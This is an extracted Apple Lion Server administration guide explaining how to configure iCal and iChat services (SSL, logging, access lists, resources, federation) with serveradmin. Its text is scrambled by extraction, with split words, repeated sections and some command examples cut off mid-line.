When you enable Secure Sockets Layer (SSL), you encrypt all data sent between the iCal server and the client. To enable SSL, you must s elect a Certificate. If you use the default self-s igned certificate, the clients mus t choos e to trust the certificate before they can make a secure connection. You can choos e to us e or redirect SSL acces s. Choos ing to use SSL access allows the iCal Server to accept connections from the unencrypted and encrypted SSL ports. Redirecting SSL acces s makes iCal server lis ten for and accept connections over the des ignated SSL port, and redirects requests for the HTTP port and sends them to the HTTPS port.
Use serveradmin via the Terminal app to change the SSL port number. sudo serveradmin set calendar:SSLPort = "<PortNumber>" The default value for <PortNumb er> is 8443. Command example: sudo serveradmin set calendar:SSLPort = "8882" Use serveradmin via the Terminal app to set the pem SSL certificate source location. sudo serveradmin set calendar:SSLCertificate = "<CertLocation>" The default value for <CertLocation > is /etc/certificates /. Command example:
sudo serveradmin set calendar:SSLCertificate = "/etc/certificates/" Use serveradmin via the Terminal app to set the pem private key source location. sudo serveradmin set calendar:SSLPrivateKey = "<PrivateKeyLoc>" The default value for <PrivateKeyLoc> is /etc/certificates /. Command example: sudo serveradmin set calendar:SSLPrivateKey = "/etc/certificates/" Use serveradmin via the Terminal app to set the pem authority chain file source location. sudo serveradmin set calendar:SSLAuthorityChain = "<ChainFile>" The default value for <ChainFile> is /etc/certificates/. Command example: sudo serveradmin set calendar:SSLAuthorityChain = "/etc/certificates/" Use serveradmin via the Terminal app to redirect insecure reques ts to the SSL port, if needed. sudo serveradmin set calendar:RedirectHTTPToHTTPS = "<setting>" The default value for <setting> is no. Command example: sudo serveradmin set calendar:RedirectHTTPToHTTPS = "yes"
Calendar serv ice
Calendar Security
Secure iCal Server network traffic

When you enable Secure Sockets Layer (SSL), you encrypt all data sent between the iCal server and the client. To enable SSL, you must s elect a Certificate. If you use the default self-s igned certificate, the clients mus t choos e to trust the certificate before they can make a secure connection. You can choos e to us e or redirect SSL acces s. Choosing to use SSL access allows the iCal Server to accept connections from the unencrypted and encrypted SSL ports. Redirecting SSL acces s makes iCal server lis ten for and accept connections over the des ignated SSL port, and redirects requests for the HTTP port and sends them to the HTTPS port. The s erver can us e an SSL certificate to identify itself electronically and communicate s ecurely with users computers and other servers on the local network and the Internet. The SSL certificate provides additional security for Addres s Book, iCal, iChat, mail, and web services. Thes e s ervices can us e the certificate to securely encrypt and decrypt data they s end to and receive from applications on users computers. You can us e the s elf-signed certificate created for your s erver when you set it up, or a s elf-signed certificate you created, but users applications wont trust these and will display mes sages asking if the user trus ts your certificate. Using a signed certificate relieves us ers from the uncertainty and tedium of manually accepting your certificate in these mess ages. A man-in-the-middle spoofing attack is pos sible with a self-s igned certificate, but not with a signed certificate, and that means users can trust the services they access.
Calendar serv ice
Calendar Security
Delete unused events and calendars

For security, privacy, or disk usage reasons , you might need to delete unused calendars. After calendar files and folders are created in the data store, they are not removed when a us er, group, or res ource is removed from the directory. This could potentially caus e unintended service behavior if a user, group, or resource is created at a future time with the same name as the defunct one. Important: Delete data with extreme caution. The deletion tool has a trial run function that lets you see what would be deleted with a given command without deleting any information. For more information on calendarserver_purge_principals and calendarserver_manage_principals, see their respective man pages.
1. Use calendarserver_manage_principals via the Terminal app to list the locations or res ources . sudo calendarserver_manage_principals --list-principals (users|groups|locations|resources) Use us ers , groups, locations , or resources as des ired. Command example: sudo calendarserver_manage_principals --list-principals locations This lists all locations or resources, including the name of the location/resource, the record name, and the UUID of the record. Full name --------SampleLocation Record name ----------7697ca41-4d75-40a2-9c57-c507ceea5f9f UUID ---7697ca41-4d75-40a2-9c57-c507ceea5f9f
2. Use calendarserver_purge_principals via the Terminal app to delete the events as sociated with the UUID. sudo calendarserver_purge_principals UUID UUID is the UUID of the desired record. Command example: sudo calendarserver_purge_principals 7697ca41-4d75-40a2-9c57-c507ceea5f9f
Calendar serv ice
Monitor Calendar
Set logging levels

iCal Server keeps two logs: one for acces s and one for errors . You can view and filter the logs to troubles hoot the service or monitor overall service reliability. You can configure logs to give more tailored information. The s ettings usually range from very verbos e (reporting everything thats happening in the server) or very quiet (reporting only the most dire errors).
Lev el Error Description Logs only critical errors. This produces the least amount of output, but it is more focused on problems. Warning Logs all errors, including innocuous errors like timeouts, and includes critical errors. Info Logs normal operating actions as well as errors. This is a fairly detailed log. Debug Logs all information of everything to fine detail. Use this setting only for debugging purposes, and then set it back to another level after the log capture is complete.
sudoserveradmin set calendar:DefaultLogLevel = "log_level_key" The default log level key is 'info' sudo serveradmin set calendar:DefaultLogLevel = "debug"
Calendar serv ice
Monitor Calendar
View iCal server logs

iCal Server keeps two logs: one for acces s and one for errors . You can view and filter the logs to troubles hoot the service or monitor service reliability.
Use serveradmin via the Terminal app to monitor the access log. tail -F /var/log/caldavd/access.log Use serveradmin via the Terminal app to monitor the error log. tail -F /var/log/caldavd/error.log
Calendar serv ice
Monitor Calendar
Rotating access logs

Service logs sometimes require archiving. Rotating the logs regularly can improve performance in searching the logs and reduce used disk space. Enabling this setting allows logs to be archived and refres hed.
sudoserveradmin set calendar:RotateAccessLog = yes
Calendar serv ice
Manage Calendar
Create the iCal Servers Service Access Control List

You determine if a user can authenticate to an iCal Server by adding him or her to a group called com.apple.acces s_calendar. You can use the Server Admin service acces s feature to add the users and groups to the group. If you manage users us ing Workgroup Manager and want to add calendar permis sions to a user, you mus t add the user to the iCal SACL list. If you manage users with Server App and add calendar permissions to a user, the us er gets the correct s ervice acces s control list (SACL) s etting for calendar use automatically.
1. Add a user to the group. You must provide the directory administrator pass word. dseditgroup -o edit -n /LDAPv3/LDAP_server_hostname -u directory_admin_username -p -a username - dseditgroup -o edit -n /LDAPv3/directory.example.com -u diradmin -p -a john_appleseed -t user co 2. Add a group to the group. You mus t provide the directory administrator pas sword. dseditgroup -o edit -n /LDAPv3/LDAP_server_hostname -u directory_admin_username -p -a group_to_b dseditgroup -o edit -n /LDAPv3/directory.example.com -u diradmin -p -a staff -t group com.apple.
Calendar serv ice
Manage Calendar
Create the iCal Servers Service Access Control List

You determine if a user can authenticate to an iCal Server by adding him or her to a group called com.apple.acces s_calendar. You can use the Server Admin service acces s feature to add the users and groups to the group.
If you manage users us ing Workgroup Manager and want to add calendar permis sions to a user, you mus t add the user to the iCal SACL list. If you manage users with Server App and add calendar permissions to a user, the us er gets the correct s ervice acces s control list (SACL) s etting for calendar use automatically.
1. Open Server Admin and s elect the server from the Servers list. 2. Click Acces s. 3. From the Service list, make sure For all services or iCal Server is selected. For all services makes changes to all services. Selecting iCal Server only changes the SACL for iCal Server. 4. To provide unres tricted acces s to iCal Server, click Allow all users and groups. 5. To restrict access to s pecific users and groups: a. Select Allow only users and groups below. b. Click the Add button (+) to open the Us ers & Groups drawer. c. Drag users and groups from the Users & Groups drawer to the list. 6. To provide pus h notification, repeat thes e steps for iChat s erver as well.
Calendar serv ice
Resources and locations
About calendar resources and locations

Users and groups arent the only parts of a calendaring system. Res ources like projectors , microscopes , or cameras , and locations like conference rooms or buildings, must be s cheduled, but they cant keep their own calendar. These res ources and locations are like us ers and groups. They accept event invitations , and they have scheduling cons traints. Therefore, they exist as principal entities on the calendar s erver for other users and groups to include in event invitations. You can make a calendar for each res ource and location in your organization.
RELATED TOPICS
Create iCal resources and locations Delete iCal resources and locations
Calendar serv ice
Delete iCal resources and locations

You can remove iCal service resource and location calendars .
1. Before deleting the location or resource, delete the events ass ociated with them. a. Use calendarserver_manage_principals via the Terminal app to list the locations or resources . sudo calendarserver_manage_principals --list-principals (locations|resources) Use locations or resources as desired. Command example: sudo calendarserver_manage_principals --list-principals locations This lists all locations or resources, including the name of the location/resource, the record name, and the UUID of the record. Full name --------Test Room 1 Record name ----------7697ca41-4d75-40a2-9c57-c507ceea5f9f UUID ---7697ca41-4d75-40a2-9c57-c507ceea5
b. In the list, find the resource or location you want to remove.
c. Use calendarserver_purge_principals via the Terminal app to delete the locations or resources us ing the UUID of the record. sudo calendarserver_purge_principals UUID UUID is the UUID of the desired record. Command example: sudo calendarserver_purge_principals 7697ca41-4d75-40a2-9c57-c507ceea5f9f 2. In the iCal Server pane of Server app, select a location or resource. 3. Click Remove ().
RELATED TOPICS
About calendar resources and locations Create iCal resources and locations
Calendar serv ice
Create iCal resources and locations

Users and groups arent the only parts of a calendaring system. Res ources like projectors , microscopes , or cameras , and locations like conference rooms or buildings, must be s cheduled, but they cant keep their own calendar. These res ources and locations are like us ers and groups. They accept event invitations , and they have scheduling cons traints. Therefore, they exist as principal entities on the calendar s erver for other users and groups to include in event invitations. Using the Server app, you can make a calendar for each resource and location in your organization. To have a delegate (or proxy) manage a location or resource calendar, the user of the iCal service mus t already exis t before ass igning delegate roles. Created locations and resources are reservable and can be set to accept event invitations automatically or through a delegate.
1. Click Add (+) to add a location or resource. 2. Enter the calendar type: Location Res ource 3. Enter a name for the location or resource. 4. Choose how the location or res ource will accept event invitations and mark the event as Busy. Automatically Makes the calendar accept all invitations in which theyre received. With Delegate Approval Holds event invitations until the designated delegate approves the invitation. You must provide a delegate. 5. Choose a delegate for the location or resource. Delegates are required, if the location or res ource is set to accept invitations with delegate approval. Delegates can also view and edit the resource calendar, even if they dont approve invitations. The delegate must be an existing iCal Server user or group. Only one delegated user or group can be assigned.
RELATED TOPICS
About calendar resources and locations Delete iCal resources and locations
Calendar serv ice
Setting a delegate using iCal client
A read-only delegate is another us er who can s ee your calendar items , including free-busy times, but not change them. Sometimes this is called a proxy user. This setting is useful for locations and resources . If you make a user or group a read-only delegate for the resource, the delegate can s ee the details of the res ources us e, rather than whether the resource is busy. Delegates can als o be made to read and write to your calendar. You might have another person add or delete events on your calendar. This is a good feature for us ers with administrative ass is tants. Delegates can only be chosen from users with iCal Server in the same authentication directory as you. For example, if your user credentials are stored in a directory like Open Directory, the delegate must als o be a user in your Open Directory s ystem.
1. In iCal, open Preferences > Accounts. 2. Select the account to share with the delegate. 3. Select the Delegation tab. 4. Click the Edit button next to Manage access to my account. 5. In the sheet that drops down, click the Add button (+). 6. Enter the account name to designate as a delegate. If you want the delegate to change your calendar, check Allow Write. 7. Click Done.
iChat serv ice
Understanding iChat
Provide instant messaging

iChat Server provides instant messaging within and outside a server user's organization. iChat Server lets users collaborate by chatting and s haring information using instant messaging and data transfer. This real-time interaction between computer users promotes collaboration without the delay of mail res pons es and blog pos tings or the expense of telephone communication or face-to-face meetings. This collaboration might include: Brainstorming s olutions, making plans, reporting progres s, and exchanging design images Exchanging weblinks and files for use as real-time references, or for follow-up viewing Generating iChat transcripts when you want a written record of interactions without taking notes Conducting weekly staff or project meetings, which can also facilitate collaboration among geographically-dispersed team members Using built-in computer microphones for audio chat Using video cameras for videoconferencinga direct, personal, and engaging form of collaboration Before starting iChat service, you may need to update your network's DNS records, if needed. Start iChat service 1. In the Server app s idebar, s elect the service you want to start. 2. Click the On/Off switch to turn on the service. 3. If a dialog asks whether you want to allow Internet acces s to the s ervice you turned on, click Allow to configure your AirPort device and make the service acces sible to Internet users. Click Dont Allow if you dont want the service to be access ible to computers on the Internet, or if youre not sure. You can change Internet acces s to s ervices later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login. The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device.Thes e services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that is nt lis ted in the Server s idebar, you can configure it to allow Internet access to services.
This process is called port forwarding or port mapping. For Information, see Router port mapping. Create a user account You can create a us er account for each person who uses the services provided by your s erver. 1. In the Users pane of the Server app, click the Add button (+). 2. In the Full Name field, enter the users name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces . 3. In the Account Name field, enter the us ers short name. If you dont want to use the generated short name, enter a different short name. After the account is created, you cant change this s hort name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen). Note: If a user has a s hort name on a Mac, try to use the same short name for the users account on the s erver. Having the same s hort name helps with the users access to services. 4. Enter the users pas sword in the Pass word and Verify fields . You can use Pas sword Ass is tant to help you choose a pass word. Click the button at the right of the Pass word field to see how s ecure the password is. The us er can change this password in the Users & Groups pane of System Preferences on the us ers computer. 5. To associate a picture with the user account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computers camera or choos e a graphic file on your computer. After taking or choos ing a picture, you can drag the picture to pan it, or us e the slider to zoom it. When you finish customizing the picture, click Set. 6. Click Done to create the user account. Allow iChat Buddies From Other Servers iChat service can let your chat server communicate with other s ervers us ing iChat s ervice, allowing buddies from other servers bes ides your own. Server-to-server chat communication is called federation. If you want to control which servers can be federated with your own, see Approve s erver-to-server chat connections . To es tablis h communication between s ervers on different networks, administrators mus t configure domain name s erver (DNS), network address translation (NAT), and firewalls, as needed. 1. In the Server app, select the iChat service pane. 2. Click Enable server-to-s erver federation. If this is the firs t time you've enabled federation, a configuration sheet appears . Otherwise, click Edit to get the configuration sheet. 3. Select Require s ecure s erver-to-server federation to restrict communication to SSL encrypted connections. Secure federation requires the federated server to accept SSL encrypted connections. You can change which SSL certificate is used for encryption by using the certificate managment feature of Server app. For more information, s ee Use an SSL certificate. Save chat transcripts An iChat client can be configured to record its own chat transcripts. The iChat Server can also be configured to record all chat messages. The client recording capability is useful to the individual iChat user, while the server mes sage logging capability is intended for administrative and auditing purposes. Chat transcripts are s aved at /Library/Server/iChat/Data/mess age_archives. 1. In the Server app, select the iChat service pane.
2. Click Archive all chat messages.
RELATED TOPICS
Change a us ers account s ettings Change a us ers group membership Change a us ers or groups name Change a us ers or groups picture Delete a user account Import users from another network account s erver
RELATED TOPICS
Provide ins tant mes saging Approve server-to-server chat connections Save chat transcripts About iChat Server technologies About s ecure connections for iChat Server
RELATED TOPICS
Provide ins tant mes saging Allow iChat Buddies From Other Servers Approve server-to-server chat connections About iChat Server technologies About s ecure connections for iChat Server
iChat serv ice
Understanding iChat
iChat Service setup overview

Here is an overview of the steps for setting up iChat service. Step 1: Configure and start Open Directory iChat uses Open Directory to authenticate users and mus t be configured before s etting up iChat. Set up an Open Directory master Step 2: (Optional) Set up the Firewall service If you are using a firewall, iChat requires specific ports to be open for iChat features to function. For more information about configuring Firewall service, s ee: Configure for standard services Configure for standard services (CLI) Step 3: Turn the iChat service on Before you configure iChat, turn it on. Start a service Step 4: Configure iChat advanced settings Configure additional settings to add host domains, select an SSL certificate, choos e your authentication method, and enable server-to-s erver federation. Configure iChat advanced settings Step 5: Configure iChat logging settings Change mess age logging settings to specify where to archive the iChat message logs . Set syslog levels for service activity. Log all iChat messages Set iChat s ervice error log levels Step 6: Restart iChat Restart iChat on the s erver.
iChat serv ice
Understanding iChat
About integrating iChat service with directory services

As with other s ervices , iChat authentication is based on Open Directory or any other Lightweight Directory Access Protocol (LDAP) server bound to the iChat Server. Integrating with Directory Services iChat accesses user accounts through directory services and cannot directly acces s the LDAP server. You can als o bind your server to other LDAP servers, enabling us ers on other LDAP servers to authenticate with your iChat Server.
iChat serv ice
Understanding iChat
Understanding iChat screen names

iChat screen names look a lot like email addresses. They consist of a user name and an ass ociated iChat server. iChat screen names are Jabber IDs and us e the general format user-short-name@iChat-domain-name (for example, nancy@ichat.example.com). The user-short-name component is the short name of a user defined in the Open Directory s earch path of the iChat Server. The iChat-domain-name component identifies the iChat Server. To us e iChat, you must have a Jabber ID and you must know the Jabber IDs of everyone you want to chat with. Your Jabber ID is created when your user account is created in Open Directory.
iChat serv ice
Understanding iChat
Set up Open Directory before iChat service

iChat uses Open Directory to authenticate users and service acces s control lists (SACLs ) to verify that us ers are authorized to use iChat. Before you can us e iChat: You mus t be defined in the Open Directory search path of that s erver. You mus t be authorized to use iChat service on that server
iChat serv ice
Understanding iChat
Clients for iChat service

You can us e any jabber client with iChat s ervice. You can use any instant mes saging applications with iChat s ervice as long as the application s upports the Jabber protocol. iChat s upports instant mess aging applications on Windows, Linux, and popular personal digital ass is tants (PDAs).
iChat serv ice
Understanding iChat
iChat configuration file locations

iChat configuration settings are stored in configuration files that corres pond to the main jabberd process and to each of its component process es. Thes e files define settings for the Jabber s erver and XMPP features supported by Jabber.
Component jabberd (startup and watchdog script) router (inter-module message routing) sm (session manager) Location /etc/jabberd/jabberd.cfg /etc/jabberd/router.xml /etc/jabberd/sm.xml
C2S (client-to-server communications) S2S (server-to-server communications) Multi-user chat room configuration
/etc/jabberd/c2s.xml /etc/jabberd/s2s.xml /etc/jabberd/Rooms.plist
iChat serv ice
Understanding iChat
iChat service log locations

There are 3 log locations for iChat service. iChat service logs are located in the following locations: The iChat service log is located in /var/log/s ystem.log. The iChat file proxy log is located in /private/var/jabberd/log/proxy65.log. The iChat service migration log is located in /Library/Logs /Migration/jabbermigrator.log.
iChat serv ice
Understanding iChat
Firewall ports for iChat service

iChat requires specific ports to be open on your server. If you have a firewall configured or you are using the Lion Server firewall, you mus t enable these ports before you can use iChat. If you run iChat Server on a secure network behind a firewall, you dont need to configure firewall s ettings as long as communication between users is within the network. Firewall s ettings are required when communicating outs ide the firewall. Depending on the iChat functions you require, make s ure the following ports are open.
Ports 1080 5060 Description SOCKS5 protocol uses this port for file transfers. iChat Session Initiation Protocol (SIP), required to use audio or video chat. 5190 iChat Instant Messenger. T his is the only port required for basic Instant Messenger use. 5222 TCP T his port is used exclusively for T LS connections if an SSL certificate is enabled. Otherwise, this port is used for nonencrypted connections. TLS encryption is preferred, because TLS connections are more secure than legacy SSL connections. 5223 TCP T his port is used for legacy SSL connections if an SSL certificate is enabled. 5269 TCP T his port is used for encrypted TLS server-to-serverconnections, as well as nonencrypted connections. T LS encryption is preferred, because T LS connections are more secure than legacy SSL connections. 5678 5297, 5298 iChat uses this local UDP to determine the users external IP address. Older versions of iChat use this port for BonJour IM. (Mac OS X v10.5 and later use dynamic ports.) 7777 T he Jabber Proxy65 module uses this port for iChat Server file transfer proxy. 16402 16384-16403 In Mac OS X 10.5 or later, this port can be used for SIP signaling. Mac OS X 10.4 and earlier use these ports for audio or video chat. Audio and video packets are sent using RTP and RT CP, and traffic is
exchanged in .Mac (MobileMe) to determine the users external port information.
iChat serv ice
Understanding iChat
Start or stop iChat service (CLI)

You can start and stop iChat service using the command line.
sudoserveradmin start jabber sudoserveradmin stop jabber
iChat serv ice
Configuring iChat
Configure iChat advanced settings

You use serveradmin to add hos t domains, choose an SSL certificate and authentication method, and configure XMPP server-toserver federation settings . Set the iChat authentication method iChat supports three methods of authentication: standard, Kerberos, or any. The "standard" method enables all methods except for plain authentication when no SSL is enabled. The "Kerberos " method enables only Kerberos authentication. The "any" method enables all pos sible authentication types. Administrators mus t us e Server app, Server Admin, or serveradmin to configure an Open Directory mas ter (with Kerberos enabled) to allow Kerberos authentication. Otherwise, the server can be configured to us e the Kerberos Domain Controller (KDC) on another host. However, the Kerberos realm hos ted by the KDC must match the realm s erved by the iChat Server. Kerberos authentication is the most secure. Use serveradmin via the Terminal app to change the setting. sudo serveradmin settings jabber:authLevel = "METHOD" The default value for <METHOD> is ANYMETHOD. The other poss ible values are STANDARD and KERBEROS. Command example: sudo serveradmin settings jabber:authLevel = "STANDARD"
Use SSL encryption with iChat service You can maximize the privacy of chats by implementing SSL with iChat s ervice. SSL us es a digital certificate to validate the identity of the s erver and to establish s ecure, encrypted data exchanges for client-to-s erver and server-to-server connections. iChat uses SSL to encrypt chat messages that are s ent over the network. However, if your iChat Server is logging chat messages, the messages are stored on the s erver in an unencrypted format. These unencrypted chat messages can be easily viewed by your server administrator. For information about message logging, see Set iChat s ervice error log levels . The digital certificate can be a self-s igned certificate or a certificate imported from a certificate authority. For information about defining, obtaining, and ins talling certificates on your s erver, see Use an SSL certificate. Use serveradmin via the Terminal app to set the certificate locations to require encryption. sudo serveradmin settings jabber:sslCAFile = "Certificate authority pem file location" sudo serveradmin settings jabber:sslKeyFile = "Key file pem location" The default locations for Certificate authority pem file location and Key file pem location are /etc/certificates /cert.chain.pem and /etc/certificates/cert.concat.pem.
Command example: sudo serveradmin settings jabber:sslCAFile = "/etc/certificates/example.private.2413CD435CEA9484 sudo serveradmin settings jabber:sslKeyFile = "/etc/certificates/example.private.2413CD435CEA948 Use serveradmin via the Terminal app to set the network ports for SSL traffic. sudo serveradmin settings jabber:jabberdClientPortSSL = "port" The default value for <port> is 5223. Command example: sudo serveradmin settings jabber:jabberdClientPortSSL = "15223" Set up iChat service on virtually hosted domains You can provide iChat s ervice to users of virtual domains on the server. iChat requires that your host have a hos t name to be used as the Jabber realm by the iChat Server that is resolvable us ing DNS. This host name is used as the Jabber realm by the iChat Server, and clients us e this realm to connect to the s ervice. Clients use a Jabber Identifier (JID) to authenticate and interact with the server. The JID us es the format us er@realm (for example, chatuser@chats erver.example.com). In this example, your iChat Server would be configured to host the realm chats erver.example.com. DNS resolution directs clients to your server when they resolve that host name. To support multiple realms , DNS should be configured appropriately. For more information, s ee Overview of DNS s etup. Use serveradmin via the Terminal app to add hos ted chat domains. sudo serveradmin settings jabber:hostsCommaDelimitedString = "FQDN,FQDN2" The default value for FQDN is the iChat server's host name. The other poss ible values are fully qualified domain names separated by commas. Command example: sudo serveradmin settings jabber:hostsCommaDelimitedString = "chatserver.example.com,chat.exampl
Set up server-to-server iChat communication When S2S federation is enabled, communication with most other XMPP-compliant chat servers is enabled, including the ability to federate with other jabber s ervices like Google Talk. Using serveradmin, you can take advantage of additional options for securing S2S communications . These options include limiting domains you can connect to. To es tablis h communication between s ervers on different networks, administrators mus t configure domain name s erver (DNS), network address translation (NAT), and firewalls, as needed. 1. Use serveradmin via the Terminal app to define the network port for federation. sudo serveradmin settings jabber:jabberdS2SPort = "port" The default value for setting is 5269. Command example: sudo serveradmin settings jabber:jabberdS2SPort = "15269" 2. Use serveradmin via the Terminal app to require SSL connections for federation. sudo serveradmin settings jabber:requireSecureS2S = "setting" The default value for setting is no. The other poss ible value is yes. If you need to s et SSL certificate information, see Use SSL encryption with iChat s ervice.
Command example: sudo serveradmin settings jabber:requireSecureS2S = "yes" 3. Use serveradmin via the Terminal app to limit domains your server connects to. a. First, set the domain restriction flag. sudo serveradmin settings jabber:s2sRestrictDomains = "setting" The default value for setting is no. The other possible value is yes. Command example: sudo serveradmin settings jabber:s2sRestrictDomains = "yes" b. Create the lis t of allowed domains. sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "domain name" sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "domain name" Command example: sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "otherserver.example.com" sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "onemore.example.com"
iChat serv ice
Configuring iChat
Log all iChat messages

Use serveradmin to configure iChat to s ave chat mess ages in a location of your choice and to specify when to archive the mess age log. The iChat Server can also be configured to record all chat messages. The client recording capability is useful to the individual iChat user, while the server mes sage logging capability is intended for adminis trative and auditing purposes. Archiving s aves disk space by compressing older mess age logs . The compres sed mes sage archives are s aved indefinitely until removed by the administrator.
1. Use serveradmin via the Terminal app to change the setting. sudo serveradmin settings jabber:enableSavedChats = "setting" The default value for <setting> is yes. The other poss ible value is no. Command example: sudo serveradmin settings jabber:enableSavedChats = "yes" 2. Use serveradmin via the Terminal app to set the mes sage archive location. sudo serveradmin settings jabber:savedChatsLocation = "filepath" The default value for filepath is /Library/Server/iChat/Data/mess age_archives. Command example: sudo serveradmin settings jabber:savedChatsLocation = "/Volumes/StorageArray/iChat/Data/message_ 3. Use serveradmin via the Terminal app to define how often the messages are archived.
sudo serveradmin settings jabber:savedChatsArchiveInterval = "day_interval" The default value for day_interval is 7. Command example: sudo serveradmin settings jabber:savedChatsArchiveInterval = "14"
iChat serv ice
Configuring iChat
Use SSL encryption with iChat service

You can maximize the privacy of chats by implementing SSL with iChat s ervice. SSL us es a digital certificate to validate the identity of the s erver and to establish s ecure, encrypted data exchanges for client-to-s erver and server-to-server connections. iChat uses SSL to encrypt chat messages that are s ent over the network. However, if your iChat Server is logging chat messages, the messages are stored on the s erver in an unencrypted format. These unencrypted chat messages can be easily viewed by your server administrator. For information about message logging, see Set iChat s ervice error log levels . The digital certificate can be a self-s igned certificate or a certificate imported from a certificate authority. For information about defining, obtaining, and ins talling certificates on your server, see Use an SSL certificate.
Use serveradmin via the Terminal app to set the certificate locations to require encryption. sudo serveradmin settings jabber:sslCAFile = "Certificate authority pem file location" sudo serveradmin settings jabber:sslKeyFile = "Key file pem location" The default locations for Certificate authority pem file location and Key file pem location are /etc/certificates /cert.chain.pem and /etc/certificates/cert.concat.pem. Command example: sudo serveradmin settings jabber:sslCAFile = "/etc/certificates/example.private.2413CD435CEA9484 sudo serveradmin settings jabber:sslKeyFile = "/etc/certificates/example.private.2413CD435CEA948 Use serveradmin via the Terminal app to set the network ports for SSL traffic. sudo serveradmin settings jabber:jabberdClientPortSSL = "port" The default value for <port> is 5223. Command example: sudo serveradmin settings jabber:jabberdClientPortSSL = "15223"
iChat serv ice
Configuring iChat
Set the iChat authentication method

iChat supports three methods of authentication: standard, Kerberos, or any. The "standard" method enables all methods except for plain authentication when no SSL is enabled. The "Kerberos " method enables only Kerberos authentication. The "any" method enables all pos sible authentication types. Administrators mus t us e Server app, Server Admin, or serveradmin to configure an Open Directory mas ter (with Kerberos enabled) to allow Kerberos authentication. Otherwise, the server can be configured to us e the Kerberos Domain Controller (KDC) on another host. However, the Kerberos realm hos ted by the KDC must match the realm s erved by the iChat Server. Kerberos authentication is the most secure.
Use serveradmin via the Terminal app to change the setting. sudo serveradmin settings jabber:authLevel = "METHOD" The default value for <METHOD> is ANYMETHOD.
The other pos sible values are STANDARD and KERBEROS. Command example: sudo serveradmin settings jabber:authLevel = "STANDARD"
iChat serv ice
Configuring iChat
Turn auto-buddy support on

You can configure iChat preferences so that when user accounts are added through the Server app they become buddies. When users are removed, they are deleted from the buddies list.
Use serveradmin via the Terminal app to change the setting. sudo serveradmin settings jabber:enableAutoBuddy = "setting" The default value for <setting> is yes. The other pos sible value is no. Command example: sudo serveradmin settings jabber:enableAutoBuddy = "yes"
iChat serv ice
Configuring iChat
Set iChat service error log levels

Lion Server's iChat service uses the s ys log for logging information about the service. You us e serveradmin change the amount of information sent to the log in order to debug service issues. The log levels add different amounts of data to the sys log. The higher the number, the more information is sent to the log:
Lev el name EMERGENCY ALERT CRITICAL ERROR WARNING NOT ICE INFO DEBUG Syslog lev el number 0 1 2 3 4 5 6 7
Use serveradmin via the Terminal app to change the log level. sudo serveradmin settings jabber:logLevel = "level" The default value for level is ERROR. The other pos sible values are EMERGENCY, ALERT, CRITICAL, WARNING, NOTICE, INFO, and DEBUG. Command example: sudo serveradmin settings jabber:logLevel = "DEBUG"
iChat serv ice
Configuring iChat
Change the iChat service domain

If you can change the domain that is associated with your iChat s ervice us ers. iChat requires that your host have a hos t name to be used as the Jabber realm by the iChat Server that is resolvable us ing DNS. This host name is used as the Jabber realm by the iChat Server, and clients us e this realm to connect to the s ervice. Clients use a Jabber Identifier (JID) to authenticate and interact with the server. The JID us es the format us er@realm (for example, chatuser@chats erver.example.com). In this example, your iChat Server would be configured to host the realm chats erver.example.com.
Use serveradmin via the Terminal app to change the hosted domain. sudo serveradmin settings jabber:hostsCommaDelimitedString = "FQDN" The default value for FQDN is the iChat server's hos t name. Command example: sudo serveradmin settings jabber:hostsCommaDelimitedString = "newchatservername.example.com"
iChat serv ice
Federation and hosting
Set up server-to-server iChat communication

When S2S federation is enabled, communication with most other XMPP-compliant chat servers is enabled, including the ability to federate with other jabber s ervices like Google Talk. Using serveradmin, you can take advantage of additional options for securing S2S communications . These options include limiting domains you can connect to. To es tablis h communication between s ervers on different networks, administrators mus t configure domain name s erver (DNS), network address translation (NAT), and firewalls, as needed.
1. Use serveradmin via the Terminal app to define the network port for federation. sudo serveradmin settings jabber:jabberdS2SPort = "port" The default value for setting is 5269. Command example: sudo serveradmin settings jabber:jabberdS2SPort = "15269" 2. Use serveradmin via the Terminal app to require SSL connections for federation. sudo serveradmin settings jabber:requireSecureS2S = "setting" The default value for setting is no. The other poss ible value is yes. If you need to s et SSL certificate information, see Use SSL encryption with iChat s ervice. Command example: sudo serveradmin settings jabber:requireSecureS2S = "yes" 3. Use serveradmin via the Terminal app to limit domains your server connects to. a. First, set the domain restriction flag. sudo serveradmin settings jabber:s2sRestrictDomains = "setting" The default value for setting is no. The other possible value is yes.
Command example: sudo serveradmin settings jabber:s2sRestrictDomains = "yes" b. Create the lis t of allowed domains. sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "domain name" sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "domain name" Command example: sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:0 = "otherserver.example.com" sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = create sudo serveradmin set jabber:s2sAllowedDomains:_array_id:1 = "onemore.example.com"
iChat serv ice
Use certificates to secure server-to-server iChat communication

